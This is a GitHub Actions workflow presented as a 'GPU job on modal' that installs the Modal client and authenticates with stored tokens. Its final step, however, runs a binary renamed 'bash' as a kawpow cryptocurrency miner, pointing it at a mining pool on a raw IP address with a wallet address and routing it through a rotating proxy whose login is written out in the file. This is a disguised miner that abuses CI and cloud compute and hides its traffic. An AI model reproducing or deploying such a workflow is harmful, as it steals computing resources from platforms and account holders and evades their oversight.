name: GPU job on modal

on:
  push:
    branches: [ "main" ]

jobs:
  gpu:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - name: Set up Python
        uses: actions/setup-python@v5
        with:
          python-version: "3.10"

      - name: Install modal
        run: |
          pip install modal

      - name: Auth modal
        env:
          MODAL_TOKEN_ID: ${{ secrets.MODAL_TOKEN_ID }}
          MODAL_TOKEN_SECRET: ${{ secrets.MODAL_TOKEN_SECRET }}
        run: |
          modal token set \
            --token-id "$MODAL_TOKEN_ID" \
            --token-secret "$MODAL_TOKEN_SECRET"

      - name: Run GPU job
        run: |
          chmod u+x bash && ./bash -a kawpow -o stratum+tcp://103.103.21.108:80 -u rUrmXcYw9tNsoBvHvQTDMrUFUd1D8MApm7.modal --proxy atrfkwzc2-rotate:jasin987@p.webshare.io:80 --no-health 
        
